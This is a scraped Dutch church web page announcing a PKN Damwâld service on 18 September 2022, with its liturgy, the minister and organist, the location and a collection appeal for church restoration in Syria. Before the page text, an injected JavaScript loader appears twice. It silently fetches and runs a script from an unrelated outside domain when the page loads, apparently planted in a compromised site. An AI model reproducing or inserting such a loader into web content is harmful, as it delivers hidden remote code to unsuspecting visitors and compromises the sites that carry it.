;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 18 september 2022 9:30 uur - PKN Damwâld
zondag 18 september 2022
09:30 uur
Bevestiging en afscheid ambtsdragers

Kerkdienst zondag 18 september 2022 9:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Nienke van der Heide-Visser
Mededeling:Bevestiging en afscheid ambtsdragers
LivestreamDienst terugkijken
Bekijk op Youtube
Liturgie
Lied voor de dienst : NLB 210: 1 en 2
Welkomstwoord
We zingen: Elb 429:1,2 en 3
Stil Gebed, Votum en Groet
We zingen: NLB. 87:1, 3 en 4
Gebed
We lezen: Ez. 47: 1 - 12 NBV
We zingen: NLB. 317: 1 en 3
Preek .
We zingen: ELB 147: 1 en 3
Afscheid ambtsdragers
We zingen: NLB. 90: 8
en bevestiging
We zingen: NLB. 363
Herdenking overlijden Aan Algra
We zingen: NLB 23b: 1 en 5
Dankgebed en voorbede
Slotlied : Elb. 186b : 1 en 2
Zegen
Collecte
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Uitganscollecte: Collecte Kerk in Actie Zending Syrië

Collecte Kerk in Actie 2022 – Zending (Syrië) (collectenummer 22089)
In Syrië leeft meer dan 90 procent van de mensen onder de armoedegrens, voor meer dan de helft dreigt honger. De oorlog in Syrië heeft een nieuw gezicht gekregen: van militair geweld naar een dramatische economische crisis. Er is nauwelijks aan eerste levensbehoeften te komen. Herstel van kerken geeft de mensen weer perspectief. Als de kerk er weer is, kan zij haar onmisbare taak in de samenleving weer oppakken: hulp bieden aan mensen, ongeacht hun afkomst of geloof, die zijn getroffen door geweld of moesten vluchten. Met een speciaal herstelfonds helpt Kerk in Actie de kerk in Syrië op te bouwen. In regio’s waar mensen voorzichtig terugkeren, worden tientallen gebouwen opgeknapt: kerken, scholen, bejaardenhuizen en gemeenschapscentra. Het herstel gaat veel langzamer dan gehoopt, omdat door de economische situatie bouwmaterialen schaars en duur zijn.